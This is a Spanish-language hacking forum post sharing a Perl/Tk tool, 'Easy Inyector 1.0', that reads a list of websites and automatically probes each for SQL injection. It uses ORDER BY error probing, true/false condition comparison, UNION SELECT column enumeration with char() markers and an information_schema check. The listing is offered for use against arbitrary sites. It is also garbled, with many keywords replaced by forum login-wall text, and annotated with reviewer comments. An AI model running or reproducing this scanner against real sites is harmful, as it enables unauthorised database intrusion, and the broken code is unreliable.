
[Perl Tk] Easy Inyector 1.0


Desconectado BigBear

« en: Julio 03, 2011, 10:00:25 pm »
Hola, acá les dejo un programa para escanear vulnerabilidades SQL: solo
ponen un archivo de texto con las webs y el programa testea si la vulnerabilidad permite hacer varias
cosas o no.

Imagen





Código: Perl
  1. #!usr/bin/perl
  2. #Easy Inyector 1.0 (C) Doddy Hackman 2011
  3.  
  4. use Tk;
  5. use Tk::FileSelect;
  6. use Win32;
  7. use LWP::UserAgent;
  8.  
  9. if ($^O eq 'MSWin32') {  # NOTE(review): `use` is resolved at compile time, so this runtime check does not make the Win32 modules optional
  10. use Win32::Console;
  11. Win32::Console::Free();  # releases the console attached to the process, leaving only the Tk window
  12. }
  13.  
  14. my $nave = LWP::UserAgent->new;  # single HTTP client; toma() sends every request through it
  15. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");  # fixed User-Agent with no space before "Firefox"; the exact string can serve as a match key when reviewing web-server logs
  16. $nave->timeout(5);  # each request gives up after 5 seconds
  17.  
  18. my $more = MainWindow->new();  # top-level Tk window; fixed 480x280 and not resizable
  19. $more->title("Easy Inyector 1.0 (C) Doddy Hackman 2011");
  20. $more->geometry("480x280+50+50");
  21. $more->resizable(0,0);
  22.  
  23. $more->Label(-text=>"File : ",-font=>"Impact1")->place(-You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login=>10,-x=>30);  # NOTE(review): the option name paired with -x was replaced by a login notice in this copy of the listing (here and below)
  24. my $filex = $more->Entry(-width=>35)->place(-You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login=>15,-x=>80);  # entry holding the path of the URL list file
  25. $more->Button(-text=>"Start",-width=>10,-command=>\&start)->place(-You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login=>12,-x=>300);  # runs start()
  26. $more->Button(-text=>"Browse",-width=>10,-command=>\&poner)->place(-x=>370,-You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login=>12);  # runs poner()
  27.  
  28. $more->Label(-text=>"Webs")->place(-You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login=>70,-x=>150);
  29. my $vuls = $more->Listbox(-width=>40)->place(-You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login=>100,-x=>50 );  # list of URLs that start() reports
  30.  
  31. $more->Label(-text=>"Risk")->place(-You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login=>70,-x=>350);
  32. my $type = $more->Listbox(-width=>10)->place(-You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login=>100,-x=>340);  # "Hight"/"Low" label written by details()
  33.  
  34. MainLoop;  # enters the Tk event loop; the named subs below are already compiled by the time this runs
  35.  
  36. sub poner {  # "Browse" button callback: pick a file and copy its path into the File entry
  37. $more->update;
  38. $browse = $more->FileSelect(-directory => "/");  # NOTE(review): $browse is a package global (no `my`); the dialog starts at "/"
  39. my $file = $browse->Show;  # NOTE(review): the result is used without checking whether a file was chosen
  40. $filex->configure(-text =>$file);
  41. }
  42.  
  43. sub start {  # "Start" button callback: read the URL list, test each distinct URL prefix, report results
  44.  
  45. my $fileax = $filex->get;  # path typed or browsed into the File entry
  46.  
  47. unless (-f $fileax) {  # only a plain existing file is accepted
  48. Win32::MsgBox("File dont exist",0,"Easy Inyector 1.0");
  49. } else {
  50.  
  51. $vuls->You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login("0.0","end");  # NOTE(review): method name lost in this copy; presumably clears the list from a previous run
  52. $type->You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login("0.0","end");
  53.  
  54. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login(FIL,$fileax);  # NOTE(review): bareword handle FIL, two arguments, no error check visible; builtin name lost in this copy
  55. my @webs = <FIL>;  # whole file read into memory, one URL per line
  56. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login FIL;
  57.  
  58. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login @webs;
  59.  
  60. my @pages = repes(cortar(@webs));  # cortar() cuts each line at its first "=", repes() drops duplicates
  61.  
  62. for my $page(@pages) {
  63.  
  64. my ($gen,$save,$control) = &You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($page,"--");  # per-URL test; the called sub's name is lost in this copy
  65. if ($control eq 1) {  # string comparison against 1
  66. $vuls->insert("end",$gen);
  67. details($gen,$bypass,$save);  # NOTE(review): $bypass is never assigned in this listing, so details() receives undef for it
  68. }
  69. }
  70. $more->update;
  71. Win32::MsgBox("[+] Scan Finished",0,"Easy Inyector 1.0");
  72. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login("start logs/sqli-logs.txt");  # NOTE(review): callee lost in this copy; presumably hands the log file to the Windows `start` command
  73. }}
  74.  
  75. sub You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login {  # per-URL test called from start(); args: URL prefix ending in "=", separator selector. NOTE(review): the sub's name is lost in this copy
  76. my $rows  = "0";  # NOTE(review): shadowed by the loop variable below and otherwise unused
  77. my $asc;
  78. my $page = $_[0];
  79.  
  80. ($pass1,$pass2) = &bypass($_[1]);  # separator and trailing token; package globals, not lexicals
  81.  
  82. $inyection = $page."1".$pass1."and".$pass1."1=0".$pass1."order".$pass1."by"."9999999999".$pass2;  # first request: out-of-range ORDER BY; "by9999999999" in a query string is a distinctive access-log pattern
  83. $code = toma($inyection);
  84. $more->update;
  85.  
  86. if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {  # continues only when the response body echoes MySQL/PHP error text; a site that does not display such errors to clients never passes this gate
  87.  
  88. $more->update;
  89.  
  90. my $testar1 = toma($page."1".$pass1."and".$pass1."1=0".$pass2);  # false-condition response
  91. my $testar2 = toma($page."1".$pass1."and".$pass1."1=1".$pass2);  # true-condition response
  92.  
  93. unless ($testar1 eq $testar2) {  # proceeds only if the two bodies differ byte-for-byte
  94. my $patha = $1;  # capture from the first pattern above (the file path inside <b>...</b>); NOTE(review): unset when a different alternative matched
  95. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login $patha;
  96. $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";  # marker for column 1, encoded as char(...) code points
  97. $total = "1";
  98. for my $rows(2..200) {  # one HTTP request per iteration, so up to 199 requests against the same URL
  99. $more->update;
  100. $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";  # marker for column $rows
  101. $total.= ",".$rows;
  102. $injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;  # growing run of "union select char(...)" requests; such bursts stand out in request logs
  103. $test = toma($injection);
  104. if ($test=~/RATSXPDOWN/) {  # the marker text came back in the response body
  105. @number = $test =~You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login{RATSXPDOWN(\d+)RATSXPDOWN}g;  # column numbers whose marker was reflected
  106. $control = 1;  # package global; start() reads the third returned value
  107. $total=~You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login/$number[0]/hackman/;  # NOTE(review): unanchored pattern, so the first occurrence of those digits is replaced with the placeholder "hackman", which may be part of a longer number
  108. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);  # NOTE(review): $save is never assigned in this listing; the statement keyword is lost in this copy
  109. }}}}}
  110.  
  111. sub details {  # classifies a reported URL as "Hight" or "Low" and appends the result to logs/sqli-logs.txt
  112. my ($page,$bypass,$save) = @_;  # $save is accepted but not used in this sub
  113. ($pass1,$pass2) = &bypass($bypass);  # package globals; with an undefined $bypass this takes bypass()'s final else branch
  114. if ($page=~/(.*)hackman(.*)/ig) {  # splits the URL around the "hackman" placeholder
  115. my  ($start,$end) = ($1,$2);
  116. $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;  # the char codes spell "ERTOR854"; that code sequence together with "information_schema.tables" in a query string is a usable log indicator
  117. $testx = toma($inforschema);
  118.  
  119. if ($testx=~/ERTOR854/ig) {  # marker reflected in the response body
  120. $type->insert("end","Hight");
  121. savefile("sqli-logs.txt","[SQLI] : $page");  # NOTE(review): the URL is written to the log as-is
  122. savefile("sqli-logs.txt","[Risk] : Hight\n");
  123. } else {
  124. savefile("sqli-logs.txt","[SQLI] : $page");
  125. savefile("sqli-logs.txt","[Risk] : Low\n");
  126. $type->insert("end","Low");
  127. }}}
  128.  
  129. sub toma {  # GET the URL in $_[0] through the shared $nave client
  130. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login $nave->get($_[0])->content;  # body is taken without looking at the HTTP status; NOTE(review): leading keyword lost in this copy
  131. }
  132.  
  133. sub savefile {  # appends $_[1] plus a newline to logs/<$_[0]>
  134. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (SAVE,">>logs/".$_[0]);  # NOTE(review): two-argument form with the mode inside the path string, bareword handle SAVE, no error check visible; presumably needs an existing logs/ directory -- confirm
  135. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login SAVE $_[1]."\n";
  136. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login SAVE;
  137. }
  138.  
  139. sub bypass {  # maps a selector string to a (separator, trailing token) pair
  140. if ($_[0] eq "/*") { You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login ("/**/","/*"); }  # comment-style separator
  141. elsif ($_[0] eq "%20") { You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login ("%20","%00"); }  # URL-encoded space, NUL terminator
  142. else {You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login ("+","--");}}  # default pair, also reached when the selector is undefined
  143.  
  144. sub ascii {  # string in $_[0] -> comma-separated list; callers wrap the result in char(...)
  145. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login ',',You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login "U*",$_[0];  # NOTE(review): builtin names lost in this copy; the "U*" template suggests the values are code points -- confirm
  146. }
  147.  
  148. sub ascii_de {  # not called anywhere in this listing
  149. $_[0] = You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login[], You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login { You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login } You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login[,],$_[0];  # assigns through $_[0], which aliases the caller's variable; NOTE(review): too much of this line is lost to say what it computes
  150. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login $_[0];
  151. }
  152.  
  153. sub cortar {  # for each input line keeps the text before the first "=" and re-appends "="
  154. my @nuevo;
  155. for(@_) {
  156. @tengo = You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login("=",$_);  # @tengo is a package global; NOTE(review): builtin name lost in this copy
  157. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login(@nuevo,@tengo[0]."=");  # @tengo[0] is a one-element slice; a line without "=" still gets "=" appended
  158. }
  159. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login @nuevo;
  160. }
  161.  
  162. sub repes {  # keeps the first occurrence of each argument
  163. foreach $test(@_) {  # $test is the package global, localized for the loop
  164. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login @limpio,$test unless $repe{$test}++;  # NOTE(review): %repe and @limpio are package globals that are never reset, so their contents carry over between calls
  165. }
  166. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login @limpio;
  167. }
  168.  
  169. # ¿ The End ?
  170.  
« Última modificación: Julio 17, 2011, 03:44:20 am por Sthefano02 »

 
